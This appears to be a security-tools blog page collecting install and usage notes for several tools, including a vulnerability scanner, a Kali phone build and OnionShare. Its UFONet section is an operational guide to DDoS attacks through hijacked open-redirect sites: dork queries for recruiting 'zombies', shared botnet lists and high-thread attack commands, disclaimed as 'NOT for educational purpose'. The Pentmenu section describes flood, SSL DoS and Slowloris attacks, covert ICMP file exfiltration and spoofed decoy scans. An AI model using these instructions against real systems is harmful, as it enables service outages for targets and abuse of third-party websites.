Vulnerability Scanner - HellRaiser

HellRaiser Vulnerability Scanner

HellRaiser Vulnerability Scanner scans targets with nmap and then correlates cpe’s found with cve-search to enumerate vulnerabilities.
In order to test and run HellRaiser Vulnerability Scanner you need to install ruby, bundler and rails. https://gorails.com/setup/ubuntu/16.04

Install redis-server and nmap.

sudo apt-get update
sudo apt-get install redis-server nmap

Clone HellRaiser repository, change to hellraiser web app directory and run bundle install and bundle exec rake db:migrate.

git clone https://github.com/m0nad/HellRaiser/
cd HellRaiser/hellraiser/
bundle install
bundle exec rake db:migrate

Start

Start redis server.

redis-server

Go to the hellraiser web app directory and start sidekiq.

bundle exec sidekiq

Go to the hellraiser web app directory and start rails server.

rails s

Usage

Access http://127.0.0.1:3000

Download HellRaiser 

Read More

Build Your Own - PwnPhone

Build Your Own PwnPhone

We’ll attempt to show you how to build your own Pwn Phone running the Kali operating system and our AOPP (Android Open Pwn Project) image.

Let’s get cracking…

Flashing the Phone

1. Download the Recovery image for your device:
   https://twrp.me/Devices
2. Connect the device to the host machine via USB cable.
3. Power off the device and boot into the Bootloader:
   Press and hold the Power & Volume-Down buttons
4. Confirm the device is recognized by the host machine:
   (a device should be listed when the command returns)
   $ fastboot devices
5. Unlock the device:$ fastboot oem unlock
6. Once unlocked, flash the Recovery image:$ fastboot flash recovery <name-of-recovery-image>.img
7. Once the Recovery image has been flashed, boot into Recovery from the Bootloader:
   Use the Volume-Down/Up buttons to cycle through the Bootloader options and then the Power button to select
8. If prompted, swipe “Swipe to Allow Modifications”.
9. Once in Recovery, wipe the device:
   Tap Wipe > Advanced Wipe > tap: Dalvik/ART cache, System, Cache, Data > swipe “Swipe to Wipe”
10. Once wiped, do NOT boot into System (You don’t have one; you just wiped it). Tap the Home button to return to the Recovery home screen.
11. Confirm again the device is recognized by the host machine:
    (a device should be listed when the command returns)$ adb devices
12. From the host machine, push the downloaded AOPP ROM zip to the device sdcard:
    $ adb push <name-of-rom-zip>.zip /sdcard/
13. On device, tap Install and then select the AOPP ROM zip from /sdcard.
14. Swipe “Swipe to Confirm Flash”
15. Once installed, tap “Reboot System”

OK Now Let’s Build the Phone

Downloading the Source

1. Refer to “Downloading and Building Requirements” before proceeding:
   https://source.android.com/source/requirements.html
2. Refer to “Downloading the Source” before proceeding:
   https://source.android.com/source/downloading.html
3. Create a directory for the build system to live in and cd into that directory:$ mkdir <WORKING_DIR>$ cd <WORKING_DIR>
4. Initialize a local repository using this source tree, use the command:
   $ repo init -u git@github.com:aopp/android_platform.git -b px-0.1
5. Sync the repository, use:
   $ repo sync

Building

Devices are referred to by codename (e.g. hammerhead). Make sure to use this when substituting <device-codename> in the following instruction set.

1. Refer to “Building the System” before proceeding:
   https://source.android.com/source/building.html
   
2. To initialize the build environment, use the following command:$ . build/envsetup.sh
3. Prepare the build environment (download device-tree and dependencies) for your specific device:$ breakfast <device-codename>
4. Connect the device running a working AOPP/AOSP ROM to the host machine via USB.
5. Make sure it is booted into system and confirm the device is recognized by the host machine:
   (a device should be listed when the command returns)$ adb devices
6. Enter the device directory:$ cd <WORKING_DIR>/device/<vendor>/<device-codename>/
7. Extract the proprietary binaries from your device:$ ./extract-files.sh
8. Return to the root of the build system:$ croot
9. Start a build run for your device:
   $ brunch <device-name>
10. Once complete, the ROM zip can be found in the out/ directory:$ cd /out/target/product/<device-codename>
11. The flashable ROM zip (product of the build run) will be located in the out/ directory as:
    aopp-0.1-<build-date>-UNOFFICIAL-<device-codename>.zip

Flashing

1. Download and install the command line tools for your OS: https://developer.android.com/studio/index.html#downloads
   
2. Download the AOPP ROM for your device:
   https://wiki.pwnieexpress.com/index.php/Official_devices
   
3. Download the Recovery image for your device:
   https://twrp.me/Devices
   
4. Connect the device to the host machine via USB cable.
5. Power off the device and boot into the Bootloader:
   Press and hold the Power & Volume-Down buttons
6. Confirm the device is recognized by the host machine:
   (a device should be listed when the command returns)
$ fastboot devices
7. Unlock the device:
$ fastboot oem unlock
8. Once unlocked, flash the Recovery image:$ fastboot flash recovery <name-of-recovery-image>.img
9. Once the Recovery image has been flashed, boot into Recovery from the Bootloader:
   Use the Volume-Down/Up buttons to cycle through the Bootloader options and then the Power button to select
10. If prompted, swipe “Swipe to Allow Modifications”.
11. Once in Recovery, wipe the device:
    Tap Wipe > Advanced Wipe > tap: Dalvik/ART cache, System, Cache, Data > swipe “Swipe to Wipe”
12. Once wiped, do NOT boot into System (You don’t have one; you just wiped it). Tap the Home button to return to the Recovery home screen.
13. Confirm again the device is recognized by the host machine:
    (a device should be listed when the command returns)$ adb devices
14. From the host machine, push the downloaded AOPP ROM zip to the device sdcard:$ adb push <name-of-rom-zip>.zip /sdcard/
15. On device, tap Install and then select the AOPP ROM zip from /sdcard.
16. Swipe “Swipe to Confirm Flash”
17. Download SuperSU from Chainfire here:
    https://download.chainfire.eu/969/SuperSU/UPDATE-SuperSU-v2.76-20160630161323.zip
18. Push the SuperSU zip to /sdcard/:
    $ adb push <SuperSU-zip-name>.zip /sdcard/
19. Once installed, tap “Reboot System”
20. Hack the Gibson…and remember…hugs are worth more than handshakes

Source: pwnieexpress

Read More

Secure Anonymous File Sharing - OnionShare

OnionShare lets you securely and anonymously share files of any size. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable URL to access and download the files. It doesn’t require setting up a server on the internet somewhere or using a third party filesharing service. You host the file on your own computer and use a Tor onion service to make it temporarily accessible over the internet. The other user just needs to use Tor Browser to download the file from you.

Features:

• A user-friendly drag-and-drop graphical user interface that works in Windows, Mac OS X, and Linux
• Ability to share multiple files and folders at once
• Support for multiple people downloading files at once
• Automatically copies the unguessable URL to your clipboard
• Shows you the progress of file transfers
• When file is done transferring, automatically closes OnionShare to reduce the attack surface
• Localized into several languages, and supports international unicode filenames

When users want to send files, the program creates a password-protected, temporary website hosted on the Tor network—what’s known as a Tor Hidden Service—that runs on their computer. They provide the recipient with the URL and password for that site, preferably via a message encrypted with a tool like PGP or Off-The-Record encrypted instant messaging. The recipient visits that URL in a Tor Browser and downloads the file from that temporary, untraceable website, without needing to have a copy of Onionshare.

As soon as the person has downloaded the file, you can just cancel the web server and the file is no longer accessible to anyone.

"It’s basically 100 percent darknet."

How to Use

Before you can share files, you need to open Tor Browser in the background. This will provide the Tor service that OnionShare uses to start the onion service.

Open OnionShare and drag and drop files and folders you wish to share, and click Start Sharing. It will show you a .onion URL such as http://asxmi4q6i7pajg2b.onion/egg-cain and copy it to your clipboard. This is the secret URL that can be used to download the file you’re sharing. If you’d like multiple people to be able to download this file, uncheck the “close automatically” checkbox.

Send this URL to the person you’re trying to send the files to. If the files you’re sending aren’t secret, you can use normal means of sending the URL: emailing it, posting it to Facebook or Twitter, etc. If you’re trying to send secret files then it’s important to send this URL securely.

The person who is receiving the files doesn’t need OnionShare. All they need is to open the URL you send them in Tor Browser to be able to download the file.

Using the command line version

In Linux: Just run  onionshare from the terminal.
In Windows: Add C:\Program Files (x86)\OnionShare to your PATH. Now you can run onionshare.exe in a command prompt.

In Mac OS X: Run ln -s /Applications/OnionShare.app/Contents/MacOS/onionshare /usr/local/bin. Now you can run onionshare from the terminal.

Onionshare can be particularly useful when someone sending a file wants to remain anonymous even to the recipient. If whistleblowers can securely send an Onionshare URL and password to a journalist, they potentially could use it to leak secrets anonymously without being exposed. That flips the model of how Tor enables leaks: Sites like WikiLeaks and news organizations using the anonymous leak software SecureDrop host their own Tor Hidden Services. Onionshare could put more power in whistleblowers’ hands, helping them send secrets to journalists who don’t have that sort of anonymous submission system in place.

What it protects against

• Third parties don’t have access to files being shared. The files are hosted directly on the sender’s computer and don’t get uploaded to any server. Instead, the sender’s computer becomes the server. Traditional ways of sending files, like in an email or using a cloud hosting service, require trusting the service with access to the files being shared.
• Network eavesdroppers can’t spy on files in transit. Because connections between Tor onion services and Tor Browser are end-to-end encrypted, no network attackers can eavesdrop on the shared files while the recipient is downloading them. If the eavesdropper is positioned on the sender’s end, the recipient’s end, or is a malicious Tor node, they will only see Tor traffic. If the eavesdropper is a malicious rendezvous node used to connect the recipient’s Tor client with the sender’s onion service, the traffic will be encrypted using the onion service key.
• Anonymity of sender and recipient are protected by Tor. OnionShare and Tor Browser protect the anonymity of the users. As long as the sender anonymously communicates the OnionShare URL with the recipient, the recipient and eavesdroppers can’t learn the identity of the sender.
• If an attacker enumerates the onion service, the shared files remain safe. There have been attacks against the Tor network that can enumerate onion services. If someone discovers the .onion address of an OnionShare onion service, they still cannot download the shared files without knowing the slug. The slug is generated by choosing two random words from a list of 6800 words, meaning there are 6800^2, or about 46 million possible slugs. But they can only make 20 wrong guesses before OnionShare stops the server, preventing brute force attacks against the slug. The OnionShare server also checks request URIs using a constant time string comparison function, so timing attacks can’t be used to help guess the slug.

What it doesn’t protect against

• Communicating the OnionShare URL might not be secure. The sender is responsible for securely communicating the OnionShare URL with the recipient. If they send it insecurely (such as through an email message, and their email is being monitored by an attacker), the eavesdropper will learn that they’re sending files with OnionShare. If the attacker loads the URL in Tor Browser before the legitimate recipient gets to it, they can download the files being shared. If this risk fits the sender’s threat model, they must find a more secure way to communicate the URL, such as in an encrypted email, chat, or voice call. This isn’t necessary in cases where the files being shared aren’t secret.
• Communicating the OnionShare URL might not be anonymous. While OnionShare and Tor Browser allow for anonymously sending files, if the sender wishes to remain anonymous they must take extra steps to ensure this while communicating the OnionShare URL. For example, they might need to use Tor to create a new anonymous email or chat account, and only access it over Tor, to use for sharing the URL. This isn’t necessary in cases where there’s no need to protect anonymity, such as coworkers who know each other sharing work documents.

Building OnionShare

Start by getting a copy of the source code:

git clone https://github.com/micahflee/onionshare.git
cd onionshare

For .deb-based distros (like Debian, Ubuntu, Linux Mint):
Then install the needed dependencies:

sudo apt-get install -y python3-flask python3-stem python3-pyqt5 python-nautilus

After that you can try both the CLI and the GUI version of OnionShare:

./install/scripts/onionshare
./install/scripts/onionshare-gui

A script to build a .deb package and install OnionShare easily is also provided for your convenience:

sudo apt-get install -y build-essential fakeroot python3-all python3-stdeb dh-python python-nautilus
./install/build_deb.sh
sudo dpkg -i deb_dist/onionshare_*.deb

Note that OnionShare uses stdeb to generate Debian packages, and python3-stdeb is not available in Ubuntu 14.04 (Trusty). Because of this, you can’t use the build_install.sh script to build the .deb file in versions of Ubuntu 14.04 and earlier. However, .deb files you build in later versions of Ubuntu will install and work fine in 14.04.

For .rpm-based distros (Red Hat, Fedora, CentOS):

sudo sudo dnf install -y rpm-build python3-flask python3-stem python3-qt5 nautilus-python
./install/build_rpm.sh
sudo yum install -y dist/onionshare-*.rpm

Depending on your distribution, you may need to use yum instead of dnf.
For ArchLinux:
There is a PKBUILD available here that can be used to install OnionShare.

Download OnionShare

Read More

SecurityTests - #3 Mind Map

Security testing is a process intended to reveal flaws in the security mechanisms of an information system that protect data and maintain functionality as intended. Due to the logical limitations of security testing, passing security testing is not an indication that no flaws exist or that the system adequately satisfies the security requirements.

Typical security requirements may include specific elements of confidentiality, integrity, authentication, availability, authorization and non-repudiation. Actual security requirements tested depend on the security requirements implemented by the system. Security testing as a term has a number of different meanings and can be completed in a number of different ways. As such a Security Taxonomy helps us to understand these different approaches and meanings by providing a base level to work from.


Source: Wikipedia
Source: amanhardikar

By OffSec

Read More

Cryptography - #2 Mind Map

Cryptography or cryptology (from Greek κρυπτός kryptós, "hidden, secret"; and γράφειν graphein, "writing", or -λογία -logia, "study", respectively) is the practice and study of techniques for secure communication in the presence of third parties called adversaries. More generally, cryptography is about constructing and analyzing protocols that prevent third parties or the public from reading private messages; various aspects in information security such as data confidentiality, data integrity, authentication, and non-repudiation are central to modern cryptography. Modern cryptography exists at the intersection of the disciplines of mathematics, computer science, and electrical engineering. Applications of cryptography include ATM cards, computer passwords, and electronic commerce.


Source: Wikipedia
Source: amanhardikar

By OffSec

Read More

Open Redirect DDoS Tool - UFONet

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet. UFONet abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.  Remember, this tool is NOT for educational purpose. Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws.


Developers assume no liability and are not responsible for any misuse or damage caused by this program.


See this links for more info:

• CWE-601:Open Redirect: http://cwe.mitre.org/data/definitions/601.html
• OWASP:URL Redirector Abuse: https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2

Installation:

UFONet runs on many platforms. It requires Python (>2.7.9) and the following libraries:

• python-pycurl – Python bindings to libcurl
• python-geoip – Python bindings for the GeoIP IP-to-country resolver library

On Debian-based systems (ex: Ubuntu), run:

sudo apt-get install python-pycurl python-geoip

Source libs:
* Python | * PyCurl | * PyGeoIP

Usage:

  Options:
   --version             show program's version number and exit
   -h, --help            show this help message and exit
   -v, --verbose         active verbose on requests
   --update              check for latest stable version
   --check-tor           check to see if Tor is used properly
   --force-yes           set 'YES' to all questions
   --gui                 run GUI (UFONet Web Interface)

   *Configure Request(s)*:
     --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
     --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
     --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
     --host=HOST         Use another HTTP Host header (default NONE)
     --xforw             Set your HTTP X-Forwarded-For with random IP values
     --xclient           Set your HTTP X-Client-IP with random IP values
     --timeout=TIMEOUT   Select your timeout (default 10)
     --retries=RETRIES   Retries when the connection timeouts (default 1)
     --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
     --delay=DELAY       Delay in seconds between each HTTP request (default 0)

   *Search for 'Zombies'*:
     -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
     --sd=DORKS          Search from 'dorks' file (ex: --sd 'botnet/dorks.txt')
     --sn=NUM_RESULTS    Set max number of results for engine (default 10)
     --se=ENGINE         Search engine to use for 'dorking' (default: bing)
     --sa                Search massively using all search engines 

   *Test Botnet*:
     -t TEST             Update 'zombies' status (ex: -t 'botnet/zombies.txt')
     --attack-me         Order 'zombies' to attack you (NAT required!)
 
   *Community*:
     --download-zombies  Download 'zombies' from Community server
     --upload-zombies    Upload your 'zombies' to Community server
     --blackhole         Create a 'blackhole' to share your 'zombies'
     --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
     --down-from=DIP     Download your 'zombies' from a 'blackhole'

   *Research Target*:
     -i INSPECT          Search biggest file (ex: -i 'http(s)://target.com')

   *Configure Attack(s)*:
     --no-head           Disable check of target's status at start
     --disable-isup      Disable round check status: 'is target up?'
     --disable-aliens    Disable 'aliens' web abuse of test services
     --disable-droids    Disable 'droids' redirectors
     -r ROUNDS           Set number of rounds (default: 1)
     -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
     -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')

   *Special Attack(s)*:
     --db=DBSTRESS       Set db stress input point (ex: --db 'search.php?q=')

Examples:

Searching for ‘zombies’:

UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:

'proxy.php?url='
'check.cgi?url='
'checklink?uri='
'validator?uri='

For example you can begin a search with:

./ufonet -s 'proxy.php?url='

Or providing a list of “dorks” from a file:

./ufonet --sd 'botnet/dorks.txt'

By default UFONet will uses a search engine called ‘bing’. But you can choose a different one:

./ufonet -s 'proxy.php?url=' --se 'bing'

This is the list of available search engines with last time that were working:

- bing [17/08/2016: OK!]
- yahoo [17/08/2016: OK!]

You can also search massively using all search engines supported:

./ufonet -s 'proxy.php?url=' --sa

To control how many ‘zombies’ receive from search engines you can use:

./ufonet --sd 'botnet/dorks.txt' --sa --sn 20

At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.

Wanna check if they are valid zombies? (Y/n)

Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

+ with verbose:     ./ufonet -s 'proxy.php?url=' -v
+ with threads:     ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100

Testing botnet:

Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’.
Urls of the ‘zombies’ should be like this:

http://target.com/check?uri=

After that, launch it:

./ufonet -t 'botnet/zombies.txt'

You can order to ‘zombies’ to attack you and see how they reply to your needs using:

./ufonet --attack-me

At the end of the process you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’, your file: zombies.txt will be updated.

Examples:

+ with verbose:     ./ufonet -t 'botnet/zombies.txt' -v
+ with proxy TOR:   ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
+ with threads:     ./ufonet -t 'botnet/zombies.txt' --threads 50

Inspecting a target:

This feature will provides you the biggest file on target:

./ufonet -i http://target.com

You can use this when attacking to be more effective:

./ufonet -a http://target.com -b "https://cdn-cyberpunk.netdna-ssl.com/biggest_file_on_target.xxx"

Example:

+input:

./ufonet -i http://target.com

+output:

       [...]

        +Image found: images/wizard.jpg
 (Size: 63798 Bytes)
 ------------
 +Style (.css) found: fonts.css
 (Size: 20448 Bytes)
 ------------
 +Webpage (.php) found: contact.php
 (Size: 2483 Bytes)
 ------------
 +Webpage (.php) found: about.php
 (Size: 1945 Bytes)
 ------------
 +Webpage (.php) found: license.php
 (Size: 1996 Bytes)
 ------------
 ================================================================================
 =Biggest File: http://target.com/images/wizard.jpg
 ================================================================================

Attacking a target:
Enter a target to attack with a number of rounds:

./ufonet -a http://target.com -r 10

On this example UFONet will attacks the target a number of 10 times for each ‘zombie’. That means that if you have a list of 1.000 ‘zombies’ it will launchs 1.000 ‘zombies’ x 10 rounds = 10.000 requests to the target.

By default if you don’t put any round it will apply only 1.

Additionally, you can choose a place to reload on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems this will do the attack more effective.

./ufonet -a http://target.com -b "/images/big_size_image.jpg"

Examples:

     + with verbose:     ./ufonet -a http://target.com -r 10 -v
     + with proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
     + with a place:     ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
     + with threads:     ./ufonet -a http://target.com -r 10 --threads 500

Download UFONet

Read More

Nmap Security Scanner - #1 Mind Map

Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich) used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses.


By OffSec

Read More

Simple Static Malware Analyzer - SSMA

SSMA is a simple malware analyzer written in Python 3.

Features:

• Searches for websites, e-mail addresses, IP addresses in the strings of the file.
  
• Looks for Windows functions commonly used by malware.
  
• Get results from VirusTotal and/or upload files.
  
• Malware detection based on Yara-rules - https://virustotal.github.io/yara/
  
• Detect well-known software packers.
  
• Detect the existence of cryptographic algorithms.
  
• Detect anti-debug and anti-virtualization techniques used by malware to evade automated analysis.
  
• Find if documents have been crafted to leverage malicious code.
  

Usage

git clone https://github.com/secrary/SSMA

cd SSMA

sudo pip3 install -r requirements.txt

python3 ssma.py -h

Additional: ssdeep - Installation
More: Simple Static Malware Analyzer

Download SSMA

Read More

A simple Bash Script for Recon and DOS Attacks - Pentmenu

A bash script inspired by pentbox.

Designed to be a simple way to implement various network pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most linux distributions without having to resort to multiple specialist tools.

Sudo is implemented where necesssary.
Tested on Debian and Arch.

Requirements:

• bash
  
• sudo
  
• curl
  
• netcat (must support '-k' option, openbsd variant recommended)
  
• hping3 (or nping can be used as a substitute for flood attacks)
  
• openssl
  
• stunnel
  
• nmap
  
• whois (not essential but preferred)
  

How to use?

• Download the script:

$ wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu

• Make it executable:

$ chmod +x ./pentmenu

• Run it:

$ ./pentmenu

Alternatively, use git clone, or download the latest release from https://github.com/GinjaChris/pentmenu/releases , extract it and run the script.

More detail

RECON MODULES

• Show IP - uses curl to perform a lookup of your external IP. Runs ip a or ifconfig (as appropriate) to show local interface IP's.
  
• DNS Recon - passive recon, performs a DNS lookup (forward or reverse as appropriate for target input) and a whois lookup of the target. If whois is not available it will perform a lookup against ipinfo.io (only works for IP's, not hostnames).
  
• Ping Sweep - uses nmap to perform an ICMP echo (ping) against the target host or network.
  
• Network Recon - uses nmap to identify live hosts, open ports, attempts OS identification, grabs banners/identifies running software version and attempts OS detection. Nmap will not perform a ping sweep prior as part of this scan. Nmap's default User-Agent string is changed to that of IE11 in this mode, to help avoid detection via HTTP. This scan can take a long time to finish, please be patient.
  
• Stealth Scan - TCP Port scanner using nmap to scan for open ports using TCP SYN scan. Nmap will not perform a ping sweep prior to performing the TCP SYN scan. This scan can take a long time to finish, please be patient.
  
• UDP scan - uses nmap to scan for open UDP ports.
  
• Check Server Uptime - estimates the uptime of the target by querying an open TCP port with hping. Accuracy of the results varies from one machine to another.
  

DOS MODULES

• TCP Syn Flood - sends a flood of TCP SYN packets using hping3. If hping3 is not found, it attempts to use the nmap-nping utility instead. Hping3 is preferred since it sends packets as fast as possible. Options are provided to use a source IP of your interface, or specify (spoof) a source IP, or spoof a random source IP for each packet. Optionally, you can add data to the SYN packet. All SYN packets have the fragmentation bit set and use hpings virtual MTU of 16 bytes, guaranteeing fragmentation. Falling back to nmap-nping means sending X number of packets per second until Y number of packets is sent and only allows the use of interface IP or a specified (spoofed) source IP. 
  A TCP SYN flood is unlikely to break a server, but is a good way to test switch/router/firewall infrastructure and state tables. 
• UDP Flood - much like the TCP SYN Flood but instead sends UDP packets to the specified host:port. Like the TCP SYN Flood function, hping3 is used but if it is not found, it attempts to use nmap-nping instead. All options are the same as TCP SYN Flood, except you can specify data to send in the UDP packets. Again, this is a good way to check switch/router throughput or to test VOIP systems.
  
• SSL DOS - uses OpenSSL to attempt to DOS a target host:port. It does this by opening many connections and causing the server to make expensive handshake calculations. This is not a pretty or elegant piece of code, do not expect it to stop immediately upon pressing 'Ctrl c', but it can be brutally effective. 
  The option for client renegotiation is given; if the target server supports client initiated renegotiation, this option should be chosen. Even if the target server does not support client renegotiation (for example CVE-2011-1473), it is still possible to impact/DOS the server with this attack. 
  It is very useful to run this against loadbalancers/proxies/SSL-enabled servers (not just HTTPS!) to see how they cope under the strain. 
• Slowloris - uses netcat to slowly send HTTP Headers to the target host:port with the intention of starving it of resources. This is effective against many, although not all, HTTP servers, provided the connections can be held open for long enough. Therefore this attack is only effective if the server does not limit the time available to send a complete HTTP request. Some implementations of this attack use clearly identifiable headers which is not the case here. The number of connections to open to the target is configurable. The interval between sending each header line is configurable, with the default being a random value between 5 and 15 seconds. The idea is to send headers slowly, but not so slow that the servers idle timeout closes the connection. The option to use SSL (SSL/TLS) is given, which requires stunnel.
  

Defences against this attack include (but are not limited to):

Limiting the number of TCP connections per client; this will prevent a single machine from making the server unavailable, but is not effective if say, 10,000 clients launch the attack simultaneously. Additionally, such a defensive measure may negatively impact multiple (legitimate) clients operating behind a forward proxy server.

Limiting the time available to send a complete HTTP request; this is effective since the attack relies on slowly sending headers to the server (the server should await all headers from the client before responding). If the server limits the time for receiving all headers of a request to 10 seconds (for example) it will severely limit the effectiveness of the attack. It is possible that such a measure will prevent legitimate clients over slow/lossy connections from accessing the site.

• Distraction Scan - this is not really a DOS attack but simply launches multiple TCP SYN scans, using hping, from a spoofed IP of your choosing (such as the IP of your worst enemy). It is designed to be an obvious scan in order to trigger any lDS/IPS the target may have and so hopefully obscure any actual scan or other action that you may be carrying out.

EXTRACTION MODULES

• File extraction via ICMP - This module uses hping to send data with ICMP packets. It can be extremely useful where only ICMP connectivity is possible.
  
• File receipt via ICMP - This module uses hping to listen for ICMP packets and record the data to an output file of your choice. It will only record packet data starting with the secret that you define. Therefore the extractor and receiver must use an identical secret.
  

An alternative to using this receiver is to run wireshark to capture the inbound icmp packets, which seems quite happy to reconstruct the data received over several fragmented ICMP packets.

• Listener - uses netcat to open a listener on a configurable TCP or UDP port. This can be useful for testing syslog connectivity, receive files or checking for active scanning on the network. Anything received by the listener is written out to ./pentmenu.listener.out.

Disclaimer
This script is only for responsible, authorised use. You are responsible for your own actions and this script is provided without warranty or guarantee of any kind. The author(s) accept no responsibility or liability on your behalf.

Also see
Pentmenu is available as a package on Arch Linux. Big love to ArchStrike and Parrot linux .

Download Pentmenu

Read More